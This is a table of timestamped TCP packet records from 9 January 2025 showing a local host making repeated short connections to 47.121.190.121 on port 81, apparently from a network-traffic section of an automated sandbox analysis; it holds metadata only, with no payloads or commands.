Jan 9, 2025 23:09:39.082770109 CET	50136	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:39.082869053 CET	50136	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:39.087924004 CET	81	50136	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:39.190107107 CET	50137	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:39.195496082 CET	81	50137	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:39.195570946 CET	50137	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:39.195741892 CET	50137	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:39.200730085 CET	81	50137	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:40.161576986 CET	81	50137	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:40.161748886 CET	81	50137	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:40.165631056 CET	50137	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:40.165764093 CET	50137	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:40.170932055 CET	81	50137	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:40.285151958 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:40.290555954 CET	81	50138	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:40.293301105 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:40.293301105 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:40.298212051 CET	81	50138	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:41.265167952 CET	81	50138	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:41.265224934 CET	81	50138	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:41.265275002 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.265275002 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.265391111 CET	50138	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.271250963 CET	81	50138	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:41.377737999 CET	50139	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.383513927 CET	81	50139	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:41.383582115 CET	50139	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.383769035 CET	50139	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:41.389750004 CET	81	50139	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:42.315531969 CET	81	50139	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:42.315596104 CET	81	50139	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:42.315792084 CET	50139	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:42.315809965 CET	50139	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:42.320669889 CET	81	50139	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:42.424168110 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:42.429195881 CET	81	50140	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:42.433191061 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:42.433341980 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:42.438215017 CET	81	50140	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:43.375273943 CET	81	50140	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:43.375308990 CET	81	50140	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:43.375472069 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.375472069 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.375472069 CET	50140	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.380390882 CET	81	50140	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:43.494609118 CET	50141	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.499516964 CET	81	50141	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:43.499618053 CET	50141	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.501667023 CET	50141	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:43.506477118 CET	81	50141	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:44.464202881 CET	81	50141	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:44.464353085 CET	81	50141	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:44.465868950 CET	50141	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:44.466033936 CET	50141	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:44.470827103 CET	81	50141	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:44.590972900 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:44.596112013 CET	81	50142	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:44.596210003 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:44.599025011 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:44.603904963 CET	81	50142	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:45.528173923 CET	81	50142	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:45.528224945 CET	81	50142	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:45.528453112 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.528453112 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.528453112 CET	50142	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.533456087 CET	81	50142	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:45.643393040 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.648632050 CET	81	50143	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:45.648731947 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.648880005 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:45.654817104 CET	81	50143	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:46.600234032 CET	81	50143	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:46.600343943 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.601140976 CET	81	50143	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:46.601295948 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.704931021 CET	50143	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.705930948 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.710069895 CET	81	50143	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:46.710800886 CET	81	50144	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:46.710972071 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.711127043 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:46.716036081 CET	81	50144	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:47.666987896 CET	81	50144	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:47.667012930 CET	81	50144	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:47.667071104 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.667071104 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.667172909 CET	50144	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.672055960 CET	81	50144	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:47.784466982 CET	50145	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.789622068 CET	81	50145	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:47.789685965 CET	50145	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.789864063 CET	50145	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:47.794739962 CET	81	50145	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:48.749830008 CET	81	50145	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:48.749918938 CET	81	50145	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:48.750128984 CET	50145	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:48.750128984 CET	50145	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:48.755008936 CET	81	50145	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:48.865169048 CET	50146	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:48.870090008 CET	81	50146	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:48.873261929 CET	50146	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:48.873384953 CET	50146	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:48.878243923 CET	81	50146	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:49.824963093 CET	81	50146	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:49.824980021 CET	81	50146	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:49.825052023 CET	50146	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:49.825217962 CET	50146	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:49.830080032 CET	81	50146	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:49.939132929 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:49.944175005 CET	81	50147	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:49.944251060 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:49.944335938 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:49.949127913 CET	81	50147	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:50.897445917 CET	81	50147	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:50.897593975 CET	81	50147	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:50.897629976 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:50.897712946 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:50.897772074 CET	50147	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:50.904067993 CET	81	50147	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:51.002789021 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:51.007936954 CET	81	50148	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:51.007994890 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:51.008116961 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:51.012839079 CET	81	50148	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:51.951117992 CET	81	50148	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:51.951335907 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:51.951380968 CET	81	50148	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:51.951435089 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:52.064193964 CET	50148	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:52.064229012 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:52.069267035 CET	81	50148	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:52.069303036 CET	81	50149	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:52.073364973 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:52.073364973 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:52.078278065 CET	81	50149	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:53.012048960 CET	81	50149	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:53.012151957 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.012198925 CET	81	50149	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:53.012253046 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.012362957 CET	50149	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.017147064 CET	81	50149	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:53.127717018 CET	50150	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.132777929 CET	81	50150	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:53.132849932 CET	50150	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.133071899 CET	50150	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:53.137854099 CET	81	50150	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:54.103575945 CET	81	50150	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:54.103671074 CET	81	50150	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:54.105508089 CET	50150	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:54.105659008 CET	50150	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:54.110692978 CET	81	50150	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:54.220738888 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:54.225754023 CET	81	50151	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:54.227550030 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:54.227792025 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:54.232650042 CET	81	50151	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:55.172177076 CET	81	50151	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:55.172194004 CET	81	50151	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:55.172245026 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.172245026 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.174906015 CET	50151	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.180094004 CET	81	50151	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:55.284607887 CET	50152	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.289505005 CET	81	50152	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:55.289580107 CET	50152	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.289752007 CET	50152	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:55.294816971 CET	81	50152	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:56.248209953 CET	81	50152	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:56.248270035 CET	81	50152	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:56.248402119 CET	50152	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:56.248560905 CET	50152	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:56.253433943 CET	81	50152	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:56.361042976 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:56.365968943 CET	81	50153	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:56.366570950 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:56.366672993 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:56.371422052 CET	81	50153	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:57.320830107 CET	81	50153	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:57.320919037 CET	81	50153	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:57.320935965 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.321005106 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.321118116 CET	50153	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.325865984 CET	81	50153	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:57.424278975 CET	50154	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.429363012 CET	81	50154	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:57.429433107 CET	50154	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.429680109 CET	50154	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:57.436665058 CET	81	50154	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:58.403860092 CET	81	50154	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:58.403959990 CET	81	50154	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:58.406050920 CET	50154	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:58.456593990 CET	50154	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:58.461638927 CET	81	50154	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:58.565231085 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:58.570280075 CET	81	50155	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:58.570369005 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:58.570632935 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:58.575454950 CET	81	50155	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:59.544503927 CET	81	50155	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:59.544559956 CET	81	50155	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:59.544603109 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.544603109 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.544740915 CET	50155	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.550324917 CET	81	50155	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:59.658725977 CET	50156	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.664902925 CET	81	50156	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:59.664988995 CET	50156	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.665153027 CET	50156	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:59.671699047 CET	81	50156	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:00.606988907 CET	81	50156	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:00.607079983 CET	81	50156	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:00.607551098 CET	50156	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:00.607666016 CET	50156	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:00.612484932 CET	81	50156	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:00.721237898 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:00.726236105 CET	81	50157	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:00.729315996 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:00.729459047 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:00.734316111 CET	81	50157	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:01.687469959 CET	81	50157	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:01.687504053 CET	81	50157	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:01.687566996 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.687566996 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.687874079 CET	50157	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.692713022 CET	81	50157	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:01.799738884 CET	50158	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.805685043 CET	81	50158	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:01.805768967 CET	50158	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.805916071 CET	50158	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:01.811527967 CET	81	50158	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:02.764133930 CET	81	50158	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:02.764156103 CET	81	50158	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:02.764362097 CET	50158	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:02.764455080 CET	50158	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:02.769314051 CET	81	50158	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:02.921247959 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:02.926332951 CET	81	50159	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:02.929450035 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:02.929450035 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:02.934411049 CET	81	50159	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:03.902530909 CET	81	50159	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:03.902601957 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:03.902616024 CET	81	50159	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:03.902693033 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:03.902762890 CET	50159	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:03.907610893 CET	81	50159	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:04.017956972 CET	50160	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:04.023262978 CET	81	50160	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:04.024605036 CET	50160	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:04.024605036 CET	50160	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:04.029490948 CET	81	50160	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:04.988034010 CET	81	50160	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:04.988117933 CET	81	50160	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:04.988274097 CET	50160	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:04.988387108 CET	50160	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:04.993189096 CET	81	50160	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:05.096091986 CET	50161	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:05.101049900 CET	81	50161	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:05.101120949 CET	50161	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:05.101257086 CET	50161	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:05.106060982 CET	81	50161	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:06.041589022 CET	81	50161	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:06.041635990 CET	81	50161	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:06.041815996 CET	50161	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:06.042047977 CET	50161	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:06.046927929 CET	81	50161	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:06.158098936 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:06.163057089 CET	81	50162	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:06.163433075 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:06.167340040 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:06.172142029 CET	81	50162	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:07.104231119 CET	81	50162	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:07.104289055 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.104387045 CET	81	50162	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:07.104428053 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.221271038 CET	50162	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.221653938 CET	50163	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.226191998 CET	81	50162	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:07.226589918 CET	81	50163	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:07.226660013 CET	50163	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.226778984 CET	50163	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:07.231522083 CET	81	50163	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:08.214723110 CET	81	50163	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:08.214833021 CET	81	50163	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:08.215749025 CET	50163	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:08.215749025 CET	50163	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:08.220627069 CET	81	50163	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:08.333262920 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:08.338113070 CET	81	50164	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:08.341312885 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:08.343266964 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:08.348129034 CET	81	50164	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:09.292649984 CET	81	50164	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:09.292721987 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.292829990 CET	81	50164	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:09.292874098 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.292979002 CET	50164	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.297852039 CET	81	50164	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:09.409091949 CET	50165	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.414455891 CET	81	50165	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:09.414537907 CET	50165	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.414659023 CET	50165	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:09.422089100 CET	81	50165	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:10.362502098 CET	81	50165	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:10.362637997 CET	81	50165	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:10.362812042 CET	50165	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:10.363111019 CET	50165	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:10.369452953 CET	81	50165	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:10.470755100 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:10.475873947 CET	81	50166	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:10.477350950 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:10.477586031 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:10.482409954 CET	81	50166	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:11.451503038 CET	81	50166	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:11.451555967 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.451644897 CET	81	50166	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:11.451685905 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.451739073 CET	50166	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.456569910 CET	81	50166	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:11.564897060 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.569822073 CET	81	50167	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:11.569894075 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.570007086 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:11.574883938 CET	81	50167	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:12.535681963 CET	81	50167	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:12.535829067 CET	81	50167	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:12.535947084 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.535947084 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.535947084 CET	50167	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.540916920 CET	81	50167	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:12.665283918 CET	50168	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.670125961 CET	81	50168	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:12.673475027 CET	50168	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.673475027 CET	50168	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:12.678317070 CET	81	50168	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:13.643697023 CET	81	50168	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:13.643708944 CET	81	50168	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:13.643758059 CET	50168	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:13.643951893 CET	50168	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:13.648683071 CET	81	50168	47.121.190.121	192.168.2.4
